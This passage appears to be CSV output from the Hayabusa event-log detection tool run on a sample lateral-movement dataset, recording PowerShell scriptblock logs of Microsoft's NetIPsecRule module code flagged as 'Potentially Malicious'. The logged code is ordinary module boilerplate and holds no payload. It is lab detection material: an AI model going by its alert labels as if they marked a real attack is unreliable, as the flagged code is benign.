($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] $",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] $",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 